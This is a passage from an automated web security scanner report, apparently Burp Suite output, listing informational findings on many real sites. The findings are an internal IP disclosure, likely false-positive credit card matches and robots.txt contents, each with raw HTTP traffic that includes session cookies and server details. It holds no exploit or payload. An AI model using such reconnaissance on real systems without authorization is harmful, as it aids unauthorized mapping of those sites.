Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=24&c=index&fromprefetch=1
By: -1
Date: 1/27/2011 4:49:27 PM
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Thursday, January 27, 2011 4:49:26 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=24&c=index&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 43 ms
-->
...[SNIP]...

27.81. http://www.unica.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unica.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/
Set-Cookie: RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/
Date: Sun, 30 Jan 2011 02:03:21 GMT
Expires: Sun, 30 Jan 2011 02:03:21 GMT
lsrequestid: 44298918
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1 - published by Open Text Web Solutions 10 - 10.0.1.90 - 31416 -->
...[SNIP]...

28. Credit card numbers disclosed
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


28.1. http://money.redacted/investing/stock-picks-to-change-your-life.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing/stock-picks-to-change-your-life.aspx

Issue detail

The following credit card number was disclosed in the response:

Request

GET /investing/stock-picks-to-change-your-life.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:23 GMT
Content-Length: 65807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
uids.aspx?uuids=ca348adf-c4ee-496a-b1df-984f1e6b2ee9,93a64449-ac2c-4057-9966-b873ae492bad,e64f36f7-ca42-4a8b-8702-ace271c7915b,28b5eb5d-b2d0-4f0e-9644-981a062a4b04,146147a2-9021-f7f4-4c44-591b72740396,46847115-2881-4319-9bf4-2e750023c4fc,01c6e44e-b2ae-431f-9b32-6e721cfa1ef9,becbe8c2-442a-4d56-99b9-8573608d400d","player.fr":"iv2_en-us_money_v2-article_investing-stock-picks-to-change-your-life"},"PlayerAd1")//]]>
...[SNIP]...
uids.aspx?uuids=ca348adf-c4ee-496a-b1df-984f1e6b2ee9,93a64449-ac2c-4057-9966-b873ae492bad,e64f36f7-ca42-4a8b-8702-ace271c7915b,28b5eb5d-b2d0-4f0e-9644-981a062a4b04,146147a2-9021-f7f4-4c44-591b72740396,46847115-2881-4319-9bf4-2e750023c4fc,01c6e44e-b2ae-431f-9b32-6e721cfa1ef9,becbe8c2-442a-4d56-99b9-8573608d400d;videoByTag.aspx%3Ftag%3Dmoney_dispatch%26ns%3DMSNmoney_Gallery%26mk%3Dus%26vs%3D1;videoByTag.aspx%3Ftag%3Dbe
...[SNIP]...

28.2. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 46219
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:06 GMT
Connection: close
Set-Cookie: JSESSIONID=5831CBDBB8382C06716441670216A316; Path=/travel
Set-Cookie: _SS=SID=AD194B1D8163435D90F9C42BAACCA3C7; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b67e617c3464e858cbe39668b3c119f; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/


                                                                                                                                   
...[SNIP]...
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4709092502668224&mkt=en-US&w=fc9a562c,f175cd72">
...[SNIP]...

28.3. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 42436
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:33 GMT
Connection: close
Set-Cookie: JSESSIONID=B12A2B796782B2243917D1037B967CBB; Path=/travel
Set-Cookie: _SS=SID=6003A84770B14256A16FA9049752AF35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ced98565d99974968bdaf56380e0a3d40; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

...[SNIP]...
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4631074424554800&mkt=en-US&w=435c5f1a,279d08d0">
...[SNIP]...

29. Robots.txt file
There are 130 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


29.1. http://ad.ae.doubleclick.net/adj/aljazeera_EN/middleeast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.ae.doubleclick.net
Path:   /adj/aljazeera_EN/middleeast

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.2. http://advertising.aol.com/privacy/advertisingcom/opt-out

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertising.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 13 Feb 2011 02:05:22 GMT
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.3. http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sun, 30 Jan 2011 01:39:20 GMT
Expires: Sun, 30 Jan 2011 01:39:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.4. http://alex-johnson.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: alex-johnson.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d541015d8baaea3bf7c1b5a91eb2bafb; expires=Sat, 25-Jan-2031 02:04:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:04:24 GMT
Content-Length: 252
Keep-Alive: timeout=3, max=995
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://alex-j
...[SNIP]...

29.5. http://amch.questionmarket.com/adsc/d852149/4/864449/randm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/864449/randm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:39:53 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "200515ce-1a-f999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=120, max=596
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

29.6. http://articles.redacted/news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://articles.redacted
Path:   /news/news.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: articles.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:05:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA45
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "77b55e7d26fdca1:ddd"
Last-Modified: Wed, 26 May 2010 22:55:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 921

User-Agent: *
Disallow: /*ocid=
Disallow: /charts/
Disallow: /money.search?q=
Disallow: /*.axd$
Disallow: /expired.htm
Disallow: /*voteshowresults=
Disallow: /*page=all
Disallow: /*page=0
Disallow: /*
...[SNIP]...

29.7. http://athima-chansanchai.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: athima-chansanchai.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=091a34afcf54cab9e8f12483071fe6ba; expires=Sat, 25-Jan-2031 02:04:33 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:04:33 GMT
Content-Length: 258
Keep-Alive: timeout=3, max=988
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://athima
...[SNIP]...

29.8. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atl.whitepages.com

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:28 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/plain
Content-Length: 54
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

# Disallow crawling of site
User-agent: *
Disallow: /

29.9. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 01:07:36 GMT
Accept-Ranges: bytes
ETag: "03c8977b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /

29.10. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

29.11. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 03:38:56 GMT
ETag: "1ae601-1a-f2349400"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /

29.12. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassistance.de
Path:   /jquery-plugins/jquery-plugin-validation/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bassistance.de

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.13. http://beta-ads.ace.advertising.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta-ads.ace.advertising.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beta-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:06:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 30 Jan 2011 02:06:03 GMT
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

User-agent: *
Disallow: /

29.14. http://blog.deconcept.com/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.deconcept.com
Path:   /swfobject/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.deconcept.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache
Last-Modified: Sun, 15 Jun 2008 07:52:21 GMT
ETag: "64a2e08-a2-44fafca6f3740"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt file for deconcept.com and blog.deconcept.com

# general crawlers

User-agent: *
Disallow: /dl
Disallow: /awstats

User-agent: duggmirror
Disallow: /

29.15. http://blogs.discovermagazine.com/badastronomy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /badastronomy/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.discovermagazine.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
X-Pingback: http://blogs.discovermagazine.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 30
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *
Disallow: /

29.16. http://blogs.nature.com/news/thegreatbeyond/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.nature.com
Path:   /news/thegreatbeyond/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.nature.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sun, 30 Jan 2011 02:06:06 GMT
Content-Length: 110
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

User-agent: *
Disallow: /*.pdf$
Disallow: /*.PDF$
Disallow: /nature/peerreview/trial/
Disallow: /publishers/


29.17. http://bodyodd.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bodyodd.msnbc.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bodyodd.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 248
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:11:09 GMT
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://bodyod
...[SNIP]...

29.18. http://boyle.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: boyle.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ea88020da6ea5ee0d991195908bb91d2; expires=Sat, 25-Jan-2031 02:05:04 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:05:04 GMT
Content-Length: 245
Keep-Alive: timeout=3, max=974
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://boyle.
...[SNIP]...

29.19. http://calendar.live.com/calendar/calendar.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calendar.live.com
Path:   /calendar/calendar.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: calendar.live.com

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 23:54:54 GMT
Accept-Ranges: bytes
ETag: "0dbc51bb4b2cb1:7a69"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
xxn: 29
Date: Sun, 30 Jan 2011 02:06:11 GMT
Connection: close

User-agent: *
Disallow:/calendar/private/

29.20. http://careers.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://careers.redacted
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: careers.redacted

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "0b2a2b9c329cb1:ddd"
Last-Modified: Thu, 22 Jul 2010 17:31:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 464

User-Agent: *
Disallow: /*pgnew=
Disallow: /*_p=
Disallow: /*ucpg=
Disallow: /?f=
Disallow: /?lc=
Disallow: /*&=&
Disallow: /*wa=wsignin1.0
Disallow: /*page=0
Disallow: /*page=&
Disallow: /*login.asp
...[SNIP]...

29.21. http://cartoonblog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cartoonblog.msnbc.redacted
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cartoonblog.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:11:16 GMT
Date: Sun, 30 Jan 2011 02:06:16 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://cartoo
...[SNIP]...

29.22. http://clients1.google.com/complete/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sat, 29 Jan 2011 23:14:01 GMT
Expires: Sat, 29 Jan 2011 23:14:01 GMT
